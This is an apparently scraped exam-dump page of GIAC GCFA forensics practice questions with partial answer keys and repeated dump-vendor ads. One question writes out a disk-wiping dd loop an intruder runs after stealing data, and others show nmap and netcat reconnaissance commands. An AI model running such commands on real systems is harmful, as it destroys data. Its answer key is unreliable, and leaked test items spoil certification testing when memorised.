GIAC.GCFA.V2018-03-11.Q309

GIAC.GCFA.v2018-03-11.q309

Exam Code: GCFA Exam Name: GIAC Certified Forensics Analyst Certification Provider: GIAC Free Question Number: 309 Version: v2018-03-11 # of views: 403 # of Questions views: 24822 https://www.freecram.com/torrent/GIAC.GCFA.v2018-03-11.q309.html

NEW QUESTION: 1 Which of the following statements is NOT true about the file slack spaces in Windows operating system? A. File slack is the space, which exists between the end of the file and the end of the last cluster. B. File slack may contain data from the memory of the system. C. It is possible to find user names, passwords, and other important information in slack. D. Large cluster size will decrease the volume of the file slack. Answer: D (LEAVE A REPLY)

NEW QUESTION: 2 In which of the following files does the Linux operating system store passwords? A. Passwd B. SAM C. Shadow D. Password Answer: (SHOW ANSWER)

NEW QUESTION: 3 Which of the following password cracking attacks is based on a pre-calculated hash table to retrieve plain text passwords? A. Rainbow attack B. Dictionary attack C. Hybrid attack D. Brute Force attack Answer: A (LEAVE A REPLY)

NEW QUESTION: 4 You work as a Network Administrator for NetTech Inc. The company has a network that consists of 200 client computers and ten database servers. One morning, you find that an unauthorized user is accessing data on a database server on the network. Which of the following actions will you take to preserve the evidences? Each correct answer represents a complete solution. Choose three. A. Preserve the log files for a forensics expert. B. Prevent a forensics experts team from entering the server room. C. Detach the network cable from the database server. D. Prevent the company employees from entering the server room. Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 5 You work as the Network Administrator for McNeil Inc. The company has a Unix-based network. You want to set the hard disk geometry parameters, cylinders, heads, and sectors. Which of the following Unix commands can you use to accomplish the task? A. mkswap B. mke2fs C. mkfs D. hdparm Answer: D (LEAVE A REPLY)

NEW QUESTION: 6 Which of the following statements about SD cards are true? Each correct answer represents a complete solution. Choose two. A. It is used with mobile phones and digital cameras. B. It is a type of non-volatile memory card. C. It is a 184-pin memory module. D. It is used as RAM on client computers and servers. Answer: (SHOW ANSWER)

NEW QUESTION: 7 Which of the following Linux file systems is a journaled file system? A. ext2 B. ext3 C. ext4 D. ext Answer: B (LEAVE A REPLY)

NEW QUESTION: 8 Which of the following type of files is NOT deleted by Disk Cleanup program of Windows XP? A. Temporary Internet Files B. Temporary Setup Files C. Old data files D. Offline Files Answer: C (LEAVE A REPLY)

NEW QUESTION: 9 What is the name of the group of blocks which contains information used by the operating system in Linux system? A. logblock B. Superblock C. Systemblock D. Bootblock Answer: (SHOW ANSWER)

NEW QUESTION: 10 Which utility enables you to access files from a Windows .CAB file? A. WINZIP.EXE B. EXTRACT.EXE C. ACCESS.EXE D. XCOPY.EXE Answer: B (LEAVE A REPLY)

NEW QUESTION: 11 Which of the following involves changing data prior to or during input to a computer in an effort to commit fraud? A. Wiretapping B. Eavesdropping C. Data diddling D. Spoofing Answer: C (LEAVE A REPLY)

NEW QUESTION: 12 Which of the following log files are used to collect evidences before taking the bit-stream image of the BlackBerry? Each correct answer represents a complete solution. Choose all that apply. A. Roam and Radio B. Radio status C. user history D. Transmit/Receive Answer: (SHOW ANSWER)

NEW QUESTION: 13 An attacker attempts to gain information about a network by specifically targeting the network resources and applications running on a computer. This method for gaining information is known as ______. A. Notification B. Enumeration C. Passive response D. Sensor E. Footprinting F. Scanning Answer: B (LEAVE A REPLY)

NEW QUESTION: 14 Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate computer of an unfaithful employee of SecureEnet Inc. Suspect's computer runs on Windows operating system. Which of the following sources will Adam investigate on a Windows host to collect the electronic evidences? Each correct answer represents a complete solution. Choose all that apply. A. Swap files B. Unused and hidden partition C. Allocated cluster D. Slack spaces Answer: (SHOW ANSWER)

NEW QUESTION: 15 Which of the following prevents malicious programs from attacking a system? A. Anti-virus program B. Biometric devices C. Firewall D. Smart cards Answer: A (LEAVE A REPLY)

NEW QUESTION: 16 Which of the following laws enacted in United States makes it illegal for an Internet Service Provider (ISP) to allow child pornography to exist on Web sites? A. Prosecutorial Remedies and Tools Against the Exploitation of Children Today Act (PROTECT Act) B. Sexual Predators Act C. Child Pornography Prevention Act (CPPA) D. USA PATRIOT Act Answer: (SHOW ANSWER) Valid GCFA Dumps shared by PrepAwayExam.com for Helping Passing GCFA Exam! PrepAwayExam.com now offer the newest GCFA exam dumps, the PrepAwayExam.com GCFA exam questions have been updated and answers have been corrected get the newest PrepAwayExam.com GCFA dumps with Test Engine here: https://www.prepawayexam.com/GIAC/braindumps.GCFA.ete.file.html (318 Q&As Dumps, 40%OFF Special Discount: freecram)

NEW QUESTION: 17 Which of the following is the initiative of United States Department of Justice, which provides state and local law enforcement agencies the tools to prevent Internet crimes against children, and catches the distributors of child pornography on the Internet? A. Anti-Child Porn.org (ACPO) B. Internet Crimes Against Children (ICAC) C. Project Safe Childhood (PSC) D. Innocent Images National Initiative (IINI) Answer: B (LEAVE A REPLY)

NEW QUESTION: 18 Which of the following is used to authenticate asymmetric keys? A. Digital signature B. Demilitarized zone (DMZ) C. Password D. MAC Address Answer: (SHOW ANSWER)

NEW QUESTION: 19 Sandra, an expert computer user, hears five beeps while booting her computer that has AMI BIOS; and after that her computer stops responding. Sandra knows that during booting process POST produces different beep codes for different types of errors. Which of the following errors refers to this POST beep code? A. Cache memory test failed B. Display memory error C. Mother board timer not operational D. Processor failure Answer: D (LEAVE A REPLY)

NEW QUESTION: 20 John works as a professional Ethical Hacker. He is assigned a project to test the security of www.weare- secure.com. He enters a single quote in the input field of the login page of the We- are-secure Web site and receives the following error message: Microsoft OLE DB Provider for ODBC Drivers error '0x80040E14' This error message shows that the We-are-secure Website is vulnerable to ______. A. An XSS attack B. A buffer overflow C. A Denial-of-Service attack D. A SQL injection attack Answer: (SHOW ANSWER)

NEW QUESTION: 21 Which of the following steps should be performed in order to optimize a system performance? Each correct answer represents a complete solution. Choose three. A. Delete the temporary files B. Edit registry regularly C. Run anti-spyware program regularly D. Defragment the hard disk drive Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 22 Which of the following graphical tools is used to navigate through directory structures? A. Windows Explorer B. Disk Cleanup C. Disk Management D. System Information Answer: (SHOW ANSWER)

NEW QUESTION: 23 You work as a professional Computer Hacking Forensic Investigator. A project has been assigned to you to investigate the DoS attack on a computer network of SecureEnet Inc. Which of the following methods will you perform to accomplish the task? Each correct answer represents a complete solution. Choose all that apply. A. Sniff network traffic to the failing machine. B. Seize all computers and transfer them to the Forensic lab. C. Look for unusual traffic on Internet connections and network segments. D. Look for core files or crash dumps on the affected systems. Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 24 Which two technologies should research groups use for secure VPN access while traveling? (Click the Exhibit button on the toolbar to see the case study.) Each correct answer represents a complete solution. Choose two. A. PPTP B. SSL C. Smart cards D. Kerberos authentication E. Encrypting File System (EFS) Answer: A,C (LEAVE A REPLY)

NEW QUESTION: 25 A Web-based credit card company had collected financial and personal details of Mark before issuing him a credit card. The company has now provided Mark's financial and personal details to another company. Which of the following Internet laws has the credit card issuing company violated? A. Security law B. Trademark law C. Copyright law D. Privacy law Answer: (SHOW ANSWER)

NEW QUESTION: 26 In which of the following security tests does the security testing team simulate as an employee or other person with an authorized connection to the organization's network? A. Stolen equipment B. Local network C. Remote dial-up network D. Remote network Answer: B (LEAVE A REPLY)

NEW QUESTION: 27 Which of the following data is NOT listed as a volatile data in RFC 3227 list for Windows based system? A. Data on a hard disk B. Kernel statistics C. Temporary file system D. Routing table Answer: (SHOW ANSWER)

NEW QUESTION: 28 Which of the following registry hives stores configuration information specific to a particular user who is currently logged on to the computer? A. HKEY_USERS B. HKEY_LOCAL_MACHINE C. HKEY_CURRENT_USER D. HKEY_CLASSES_ROOT Answer: C (LEAVE A REPLY)

NEW QUESTION: 29 John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He wants to test the effect of a virus on the We-are-secure server. He injects the virus on the server and, as a result, the server becomes infected with the virus even though an established antivirus program is installed on the server. Which of the following do you think are the reasons why the antivirus installed on the server did not detect the virus injected by John? Each correct answer represents a complete solution. Choose all that apply. A. The mutation engine of the virus is generating a new encrypted code. B. John has changed the signature of the virus. C. John has created a new virus. D. The virus, used by John, is not in the database of the antivirus program installed on the server. Answer: A,B,C,D (LEAVE A REPLY)

NEW QUESTION: 30 Which of the following cryptographic methods are used in EnCase to ensure the integrity of the data, which is acquired for the investigation? Each correct answer represents a complete solution. Choose two. A. MD5 B. CRC C. Twofish D. HAVAL Answer: A,B (LEAVE A REPLY)

NEW QUESTION: 31 The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm? A. HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file" B. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run C. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices D. HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Answer: (SHOW ANSWER)

Valid GCFA Dumps shared by PrepAwayExam.com for Helping Passing GCFA Exam! PrepAwayExam.com now offer the newest GCFA exam dumps, the PrepAwayExam.com GCFA exam questions have been updated and answers have been corrected get the newest PrepAwayExam.com GCFA dumps with Test Engine here: https://www.prepawayexam.com/GIAC/braindumps.GCFA.ete.file.html (318 Q&As Dumps, 40%OFF Special Discount: freecram)

NEW QUESTION: 32 The promiscuous mode is a configuration of a network card that makes the card pass all traffic it receives to the central processing unit rather than just packets addressed to it. Which of the following tools works by placing the host system network card into the promiscuous mode? A. Sniffer B. NetStumbler C. Snort D. THC-Scan Answer: A (LEAVE A REPLY)

NEW QUESTION: 33 On which of the following locations does the Windows NT/2000 operating system contain the SAM, SAM.LOG, SECURITY.LOG, APPLICATION.LOG, and EVENT.LOG files? A. \%Systemroot%system32config B. \%Systemroot%system32 C. \%Systemroot%help D. \%Systemroot%profiles Answer: A (LEAVE A REPLY)

NEW QUESTION: 34 Every network device contains a unique built in Media Access Control (MAC) address, which is used to identify the authentic device to limit the network access. Which of the following addresses is a valid MAC address? A. F936.28A1.5BCD.DEFA B. 1011-0011-1010-1110-1100-0001 C. 132.298.1.23 D. A3-07-B9-E3-BC-F9 Answer: (SHOW ANSWER) NEW QUESTION: 35 John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He traceroutes the We-are-secure server and gets the following result:

Considering the above traceroute result, which of the following statements can be true? Each correct answer represents a complete solution. Choose all that apply. A. The We-are-secure server is using a packet filtering firewall. B. Some router along the path is down. C. While tracerouting, John's network connection has become slow. D. The IP address of the We-are-secure server is not valid. Answer: A,B,C (LEAVE A REPLY)

NEW QUESTION: 36 Mark works as a security manager for SofTech Inc. He is using a technique for monitoring what the employees are doing with corporate resources. Which of the following techniques is being used by Mark to gather evidence of an ongoing computer crime if a member of the staff is e- mailing company's secrets to an opponent? A. Physical surveillance B. Electronic surveillance C. Civil investigation D. Criminal investigation Answer: B (LEAVE A REPLY)

NEW QUESTION: 37 Which of the following Windows Registry key contains the password file of the user? A. HKEY_CURRENT_CONFIG B. HKEY_DYN_DATA C. HKEY_LOCAL_MACHINE D. HKEY_USER Answer: C (LEAVE A REPLY)

NEW QUESTION: 38 John works as a Network Security Professional. He is assigned a project to test the security of www.we- are-secure.com. He is working on the Linux operating system and wants to install an Intrusion Detection System on the We-are-secure server so that he can receive alerts about any hacking attempts. Which of the following tools can John use to accomplish the task? Each correct answer represents a complete solution. Choose all that apply. A. Snort B. Samhain C. SARA D. Tripwire Answer: A,B (LEAVE A REPLY)

NEW QUESTION: 39 TCP FIN scanning is a type of stealth scanning through which the attacker sends a FIN packet to the target port. If the port is closed, the victim assumes that this packet was sent mistakenly by the attacker and sends the RST packet to the attacker. If the port is open, the FIN packet will be ignored and the port will drop the packet. Which of the following operating systems can be easily identified with the help of TCP FIN scanning? A. Windows B. Knoppix C. Red Hat D. Solaris Answer: A (LEAVE A REPLY)

NEW QUESTION: 40 Which of the following wireless network standards operates on the 5 GHz band and transfers data at a rate of 54 Mbps? A. 802.11b B. 802.11u C. 802.11a D. 802.11g Answer: C (LEAVE A REPLY)

NEW QUESTION: 41 Which of the following is used to detect the bad sectors in a hard disk under Linux environment? A. ScanDisk B. Badblocks C. CHKDSK D. CheckDisk Answer: B (LEAVE A REPLY)

NEW QUESTION: 42 Which of the following file systems cannot be used to install an operating system on the hard disk drive? Each correct answer represents a complete solution. Choose two. A. Novell Storage Services (NSS) B. Compact Disc File System (CDFS) C. Windows NT file system (NTFS) D. Log-structured file system (LFS) E. High Performance File System (HPFS) Answer: B,D (LEAVE A REPLY)

NEW QUESTION: 43 John works as a contract Ethical Hacker. He has recently got a project to do security checking for www.we-are-secure.com. He wants to find out the operating system of the we-are-secure server in the information gathering step. Which of the following commands will he use to accomplish the task? Each correct answer represents a complete solution. Choose two. A. nc 208.100.2.25 23 B. nmap -v -O www.we-are-secure.com C. nc -v -n 208.100.2.25 80 D. nmap -v -O 208.100.2.25 Answer: B,D (LEAVE A REPLY) Explanation/Reference:

NEW QUESTION: 44 You work as a Network Administrator for Perfect Solutions Inc. The company has a Linux-based network. You are creating a user account by using the USERADD command. Which of the following entries cannot be used for specifying a user ID? Each correct answer represents a complete solution. Choose all that apply. A. 99 B. -1 C. 100 D. 0 Answer: A,B,D (LEAVE A REPLY)

NEW QUESTION: 45 Which of the following commands is used to enforce checking of a file system even if the file system seems to be clean? A. e2fsck -b B. e2fsck -c C. e2fsck -p D. e2fsck -f Answer: (SHOW ANSWER)

NEW QUESTION: 46 Which of the following standard technologies is not used to interface hard disk with the computer? A. SCSI B. USB C. PS/2 D. IDE/ATA Answer: (SHOW ANSWER)

NEW QUESTION: 47 Which of the following is the correct order of digital investigations Standard Operating Procedure (SOP)? A. Initial analysis, request for service, data collection, data analysis, data reporting B. Request for service, initial analysis, data collection, data analysis, data reporting C. Initial analysis, request for service, data collection, data reporting, data analysis D. Request for service, initial analysis, data collection, data reporting, data analysis Answer: (SHOW ANSWER)

NEW QUESTION: 48 John used to work as a Network Administrator for We-are-secure Inc. Now he has resigned from the company for personal reasons. He wants to send out some secret information of the company. To do so, he takes an image file and simply uses a tool image hide and embeds the secret file within an image file of the famous actress, Jennifer Lopez, and sends it to his Yahoo mail id. Since he is using the image file to send the data, the mail server of his company is unable to filter this mail. Which of the following techniques is he performing to accomplish his task? A. Steganography B. Web ripping C. Social engineering D. Email spoofing Answer: (SHOW ANSWER)

NEW QUESTION: 49 Which of the following articles defines illegal access to the computer or network in Chapter 2 of Section 1, i.e., Substantive criminal law of the Convention on Cybercrime passed by the Council of Europe? A. Article 5 B. Article 16 C. Article 3 D. Article 2 Answer: D (LEAVE A REPLY)

NEW QUESTION: 50 Adam works as a professional Computer Hacking Forensic Investigator. He has been assigned with the project of investigating an iPod, which is suspected to contain some explicit material. Adam wants to connect the compromised iPod to his system, which is running on Windows XP (SP2) operating system. He doubts that connecting the iPod with his computer may change some evidences and settings in the iPod. He wants to set the iPod to read-only mode. This can be done by changing the registry key within the Windows XP (SP2) operating system. Which of the following registry keys will Adam change to accomplish the task? A. HKEY_LOCAL_MACHINE\System\CurrentControlset\StorageDevicePolicies B. HKEY_LOCAL_MACHINE\System\CurrentControlset\Control\StorageDevicePolicies C. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion D. HKEY_LOCAL_MACHINE\CurrentControlset\Control\StorageDevicePolicies Answer: B (LEAVE A REPLY)

NEW QUESTION: 51 Which of the following laws or acts, formed in Australia, enforces prohibition against cyber stalking? A. Stalking Amendment Act (1999) B. Malicious Communications Act (1998) C. Stalking by Electronic Communications Act (2001) D. Anti-Cyber-Stalking law (1999) Answer: (SHOW ANSWER)

NEW QUESTION: 52 Which of the following tools are used to determine the hop counts of an IP packet? Each correct answer represents a complete solution. Choose two. A. Ping B. Netstat C. IPCONFIG D. TRACERT Answer: A,D (LEAVE A REPLY) NEW QUESTION: 53 Maria works as a professional Ethical Hacker. She recently got a project to test the security of www.we- are-secure.com. Arrange the three pre-test phases of the attack to test the security of weare-secure. Select and Place:

Answer:

NEW QUESTION: 54 Which of the following is a formula, practice, process, design, instrument, pattern, or compilation of information which is not generally known, but by which a business can obtain an economic advantage over its competitors? A. Copyright B. Utility model C. Cookie D. Trade secret Answer: D (LEAVE A REPLY)

NEW QUESTION: 55 This type of virus infects programs that can execute and load into memory to perform predefined steps for infecting systems. It infects files with the extensions .EXE, .COM, .BIN, and .SYS. As it can replicate or destroy these types of files, the operating system becomes corrupted and needs reinstallation. This type of virus is known as ______. A. File virus B. Multipartite virus C. Polymorphic virus D. Stealth virus E. Boot sector virus Answer: (SHOW ANSWER)

NEW QUESTION: 56 Adam works as a professional Computer Hacking Forensic Investigator. He works with the local police. A project has been assigned to him to investigate an iPod, which was seized from a student of the high school. It is suspected that the explicit child pornography contents are stored in the iPod. Adam wants to investigate the iPod extensively. Which of the following operating systems will Adam use to carry out his investigations in more extensive and elaborate manner? A. Linux B. Mac OS C. MINIX 3 D. Windows XP Answer: B (LEAVE A REPLY)

NEW QUESTION: 57 Rick works as a Network Administrator for uCertify Inc. He takes a backup of some important compressed files on an NTFS partition, using the Windows 2000 Backup utility. Rick restores these files in a FAT32 partition. He finds that the restored files do not have the compression attribute. What is the most likely cause? A. The Windows 2000 Backup utility decompresses compressed files while taking a backup. B. A FAT32 partition does not support compression. C. The backup of files that are saved on an NTFS partition cannot be restored in a FAT32 partition. D. The FAT32 partition is corrupt and requires to be reformatted. Answer: B (LEAVE A REPLY)

NEW QUESTION: 58 Which of the following file systems contains hardware settings of a Linux computer? A. /var B. /home C. /proc D. /etc Answer: C (LEAVE A REPLY)

NEW QUESTION: 59 Which of the following file systems provides file-level security? A. CDFS B. NTFS C. FAT D. FAT32 Answer: (SHOW ANSWER)

NEW QUESTION: 60 Trinity wants to send an email to her friend. She uses the MD5 generator to calculate cryptographic hash of her email to ensure the security and integrity of the email. MD5 generator, which Trinity is using operates in two steps: Creates check file Verifies the check file Which of the following MD5 generators is Trinity using? A. Mat-MD5 B. Chaos MD5 C. MD5 Checksum Verifier D. Secure Hash Signature Generator Answer: C (LEAVE A REPLY)

NEW QUESTION: 61 You work as a Network Administrator for Tech Perfect Inc. The company has a Linux-based network. Users complain that they are unable to access resources on the network. However, there was no such problem the previous day. They are receiving the following error messages regularly: Unable to resolve host name As your primary step for resolving the issue, which of the following services will you verify whether it is running or not? A. APACHE B. BIND C. SAMBA D. SQUID Answer: B (LEAVE A REPLY) Valid GCFA Dumps shared by PrepAwayExam.com for Helping Passing GCFA Exam! PrepAwayExam.com now offer the newest GCFA exam dumps, the PrepAwayExam.com GCFA exam questions have been updated and answers have been corrected get the newest PrepAwayExam.com GCFA dumps with Test Engine here: https://www.prepawayexam.com/GIAC/braindumps.GCFA.ete.file.html (318 Q&As Dumps, 40%OFF Special Discount: freecram)

NEW QUESTION: 62 A customer comes to you stating that his hard drive has crashed. He had backed up the hard drive, but some files on it were encrypted with Windows Encrypted File System (EFS). What do you need to do to be able to give him access to those restored encrypted files? A. You need the encryption key. If that was not saved/backed up, then there is no chance of recovery. B. Nothing, they are unrecoverable. C. You need to make sure that when you restore, you give the new machine the same user account so that he can open the encrypted files. D. Nothing, when you restore, he will have access. Answer: A (LEAVE A REPLY)

NEW QUESTION: 63 You work as a Web developer for ABC Inc. You want to investigate the Cross-Site Scripting attack on your company's Web site. Which of the following methods of investigation can you use to accomplish the task? Each correct answer represents a complete solution. Choose all that apply. A. Use Wireshark to capture traffic going to the server and then searching for the requests going to the input page, which may give log of the malicious traffic and the IP address of the source. B. Look at the Web server's logs and normal traffic logging. C. Review the source of any HTML-formatted e-mail messages for embedded scripts or links in the URL to the company's site. D. Use a Web proxy to view the Web server transactions in real time and investigate any communication with outside servers. Answer: B,C,D (LEAVE A REPLY)

NEW QUESTION: 64 Which of the following refers to the ability to ensure that the data is not modified or tampered with? A. Non-repudiation B. Integrity C. Confidentiality D. Availability Answer: B (LEAVE A REPLY)

NEW QUESTION: 65 Which of the following directories contains administrative commands and daemon processes in the Linux operating system? A. /sbin B. /usr C. /etc D. /dev Answer: A (LEAVE A REPLY)

NEW QUESTION: 66 Which of the following file systems supports disk quotas? A. NTFS B. FAT C. FAT32 D. CDFS Answer: A (LEAVE A REPLY)

NEW QUESTION: 67 SIMULATION Fill in the blank with the appropriate file system. Alternate Data Streams (ADS) is a feature of the_____ file system, which allows more than one data stream to be associated with a filename. Answer: NTFS

NEW QUESTION: 68 Which of the following types of attack can guess a hashed password? A. Evasion attack B. Denial of Service attack C. Brute force attack D. Teardrop attack Answer: (SHOW ANSWER)

NEW QUESTION: 69 Victor works as a professional Ethical Hacker for SecureEnet Inc. He has been assigned a job to test an image, in which some secret information is hidden, using Steganography. Victor performs the following techniques to accomplish the task: 1. Smoothening and decreasing contrast by averaging the pixels of the area where significant color transitions occurs. 2. Reducing noise by adjusting color and averaging pixel value. 3. Sharpening, Rotating, Resampling, and Softening the image. Which of the following Steganography attacks is Victor using? A. Active Attacks B. Steg-Only Attack C. Chosen-Stego Attack D. Stegdetect Attack Answer: A (LEAVE A REPLY)

NEW QUESTION: 70 Adam works as a Security Administrator for Umbrella Inc. He is responsible for securing all 15 servers of the company. To successfully accomplish the task, he enables the hardware and software firewalls and disables all unnecessary services on all the servers. Sales manager of the company asks Adam to run emulation software on one of the servers that requires the telnet service to function properly. Adam is concerned about the security of the server, as telnet can be a very large security risk in an organization. Adam decides to perform some footprinting, scanning, and penetration testing on the server to checkon the server to check the security. Adam telnets into the server and writes the following command: HEAD / HTTP/1.0 After pressing enter twice, Adam gets the following results:

Which of the following tasks has Adam just accomplished? A. Submitted a remote command to crash the server. B. Grabbed the banner. C. Downloaded a file to his local computer. D. Poisoned the local DNS cache of the server. Answer: B (LEAVE A REPLY)

NEW QUESTION: 71 Mark works as a Network administrator for SecureEnet Inc. His system runs on Mac OS X. He wants to boot his system from the Network Interface Controller (NIC). Which of the following snag keys will Mark use to perform the required function? A. C B. Z C. N D. D Answer: C (LEAVE A REPLY)

NEW QUESTION: 72 Which of the following file systems provides integrated security? A. CDFS B. HPFS C. FAT32 D. EFS Answer: D (LEAVE A REPLY)

NEW QUESTION: 73 Adam works as a Security Administrator for Umbrella Technology Inc. He reported a breach in security to his senior members, stating that "security defenses has been breached and exploited for 2 weeks by hackers." The hackers had accessed and downloaded 50,000 addresses containing customer credit cards and passwords. Umbrella Technology was looking to law enforcement officials to protect their intellectual property. The intruder entered through an employee's home machine, which was connected to Umbrella Technology's corporate VPN network. The application called BEAST Trojan was used in the attack to open a "back door" allowing the hackers undetected access. The security breach was discovered when customers complained about the usage of their credit cards without their knowledge. The hackers were traced back to Shanghai, China through e-mail address evidence. The credit card information was sent to that same e-mail address. The passwords allowed the hackers to access Umbrella Technology's network from a remote location, posing as employees. Which of the following actions can Adam perform to prevent such attacks from occurring in future? A. Disable VPN access to all employees of the company from home machines B. Allow VPN access but replace the standard authentication with biometric authentication. C. Replace the VPN access with dial-up modem access to the company's network. D. Apply different security policy to make passwords of employees more complex. Answer: A (LEAVE A REPLY)

NEW QUESTION: 74 Which of the following tools can be used to perform a whois query? Each correct answer represents a complete solution. Choose all that apply. A. WsPingPro B. SuperScan C. Traceroute D. Sam Spade Answer: A,B,D (LEAVE A REPLY)

NEW QUESTION: 75 Which of the following sections of an investigative report covers the background and summary of the report including the outcome of the case and the list of allegations? A. Section 4 B. Section 3 C. Section 2 D. Section 1 Answer: C (LEAVE A REPLY)

NEW QUESTION: 76 John works for an Internet Service Provider (ISP) in the United States. He discovered child pornography material on a Web site hosted by the ISP. John immediately informed law enforcement authorities about this issue. Under which of the following Acts is John bound to take such an action? A. Civil Rights Act of 1991 B. Civil Rights Act of 1964 C. Sexual Predators Act D. PROTECT Act Answer: C (LEAVE A REPLY)

NEW QUESTION: 77 Sam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a compromised system, which runs on Linux operating system. Sam wants to investigate and review local software, system libraries, and other application installed on the system. Which of the following directories in Linux will he review to accomplish the task? A. /tmp B. /lib C. /mnt D. /sbin Answer: (SHOW ANSWER)

NEW QUESTION: 78 An organization wants to mitigate the risks associated with the lost or stolen laptops and the associated disclosure laws, while reporting data breaches. Which of the following solutions will be best for the organization? A. Whole disk encryption B. Hashing function C. Digital signature D. Trusted Platform Module Answer: (SHOW ANSWER)

NEW QUESTION: 79 Adam, a malicious hacker has successfully gained unauthorized access to the Linux system of Umbrella Inc. Web server of the company runs on Apache. He has downloaded sensitive documents and database files from the computer. After performing these malicious tasks, Adam finally runs the following command on the Linux command box before disconnecting. for (( i = 0;i<11;i++ )); do dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda done Which of the following actions does Adam want to perform by the above command? A. Infecting the hard disk with polymorphic virus strings. B. Wiping the contents of the hard disk with zeros. C. Making a bit stream copy of the entire hard disk for later download. D. Deleting all log files present on the system. Answer: B (LEAVE A REPLY)

NEW QUESTION: 80 Which of the following provides high availability of data? A. Anti-virus software B. Backup C. EFS D. RAID Answer: (SHOW ANSWER) NEW QUESTION: 81 You are responsible for maintaining and troubleshooting PC's at your company. The receptionist reports her screen has gone blue. When you get there you notice the 'blue screen of death' with an error message NTFS_FILE_SYSTEM. What is the most likely cause of this error? A. Windows was installed improperly. B. A virus C. Get the latest patch for Windows. D. The hard disk is corrupt Answer: (SHOW ANSWER)

NEW QUESTION: 82 Which of the following files starts the initialization process in booting sequence of the Linux operating system? A. /etc/rc/rc.sysinit B. /etc/rc/rc.local C. /etc/sbin/init D. /etc/inittab Answer: C (LEAVE A REPLY)

NEW QUESTION: 83 In the United States, Title VII of the 1964 Civil Rights Act was formulated to protect an employee from discrimination on the basis of religion, color, race, national origin, and sex. This law makes discrimination in employment illegal. Which of the following was the original emphasis of the Act? A. Protect woman in the workplace B. Equal position to all employees C. Protect fundamental rights of an employee D. Prevent child pornography Answer: A (LEAVE A REPLY)

NEW QUESTION: 84 Which of the following tools is a wireless sniffer and analyzer that works on the Windows operating system? A. Kismet B. Aeropeek C. Void11 D. Airsnort Answer: (SHOW ANSWER)

NEW QUESTION: 85 Which of the following types of evidence proves or disproves a specific act through oral testimony based on information gathered through the witness's five senses? A. Hearsay evidence B. Direct evidence C. Conclusive evidence D. Best evidence Answer: (SHOW ANSWER)

NEW QUESTION: 86 Which of the following encryption methods use the RC4 technology? Each correct answer represents a complete solution. Choose all that apply. A. CCMP B. TKIP C. Dynamic WEP D. Static WEP Answer: (SHOW ANSWER)

NEW QUESTION: 87 Mark is taking a data backup during non-working hours from a remote computer on the network by using the Backup utility. What will he do to ensure that the backup has no errors? A. Take a full backup. B. Take an incremental backup. C. Log off all the users from the network. D. Verify the backup. Answer: D (LEAVE A REPLY)

NEW QUESTION: 88 Which of the following statements are true about routers? Each correct answer represents a complete solution. Choose all that apply. A. Routers organize addresses into classes, which are used to determine how to move packets from one network to another. B. Routers do not limit physical broadcast traffic. C. Routers act as protocol translators and bind dissimilar networks. D. Routers are responsible for making decisions about which of several paths network (or Internet) traffic will follow. Answer: A,C,D (LEAVE A REPLY)

NEW QUESTION: 89 Sarah has created a site on which she publishes a copyrighted material. She is ignorant that she is infringing copyright. Is she guilty under copyright laws? A. No B. Yes Answer: B (LEAVE A REPLY)

NEW QUESTION: 90 The incident response team has turned the evidence over to the forensic team. Now, it is the time to begin looking for the ways to improve the incident response process for next time. What are the typical areas for improvement? Each correct answer represents a complete solution. Choose all that apply. A. Electronic monitoring statement B. Incident response plan C. Additional personnel security controls D. Information dissemination policy Answer: A,B,C,D (LEAVE A REPLY)

NEW QUESTION: 91 Adam works as a Computer Hacking Forensic Investigator in a law firm. He has been assigned with his first project. Adam collected all required evidences and clues. He is now required to write an investigative report to present before court for further prosecution of the case. He needs guidelines to write an investigative report for expressing an opinion. Which of the following are the guidelines to write an investigative report in an efficient way? Each correct answer represents a complete solution. Choose all that apply. A. There should not be any assumptions made about any facts while writing the investigative report. B. The investigative report should be understandable by any reader. C. Opinion of a lay witness should be included in the investigative report. D. All ideas present in the investigative report should flow logically from facts to conclusions. Answer: A,B,D (LEAVE A REPLY)

NEW QUESTION: 92 Which of the following switches of the XCOPY command copies attributes while copying files? A. /s B. /p C. /o D. /k Answer: (SHOW ANSWER)

NEW QUESTION: 93 Which of the following precautionary steps are taken by the supervisors or employers to avoid sexual harassment in workplace? Each correct answer represents a complete solution. Choose all that apply. A. Contact the police and take legal action. B. Communicate to an employee who is indulging in such behavior. C. Immediately take action on the complaint. D. Establish a complaint mechanism. Answer: B,C,D (LEAVE A REPLY)

NEW QUESTION: 94 You want to change the attribute of a file named ACE.TXT to Hidden. Which command line will enable you to set the attribute? A. ATTRIB ACE.TXT /HR B. ATTRIB ACE.TXT +H C. ATTRIB ACE.TXT /H D. ATTRIB ACE.TXT -H Answer: B (LEAVE A REPLY)

NEW QUESTION: 95 Which of the following diagnostic codes sent by POST to the internal port h80 refers to the system board error? A. 200 to 299 B. 400 to 499 C. 300 to 399 D. 100 to 199 Answer: (SHOW ANSWER)

NEW QUESTION: 96 You work as a Network Administrator for Peach Tree Inc. The company currently has a FAT- based Windows NT network. All client computers run Windows 98. The management wants all client computers to be able to boot in Windows XP Professional. You want to accomplish the following goals: The file system should support file compression and file level security. All the existing data and files can be used by the new file system. Users should be able to dual-boot their computers. You take the following steps to accomplish these goals: Convert the FAT file system to NTFS using the CONVERT utility. Install Windows XP and choose to upgrade the existing operating system during setup. Which of the following goals will you be able to accomplish? Each correct answer represents a complete solution. Choose all that apply. A. Users are able to dual-boot their computers. B. All the existing data and files can be used by the new file system. C. The file system supports file compression and file level security. D. None of the goals are accomplished. Answer: (SHOW ANSWER)

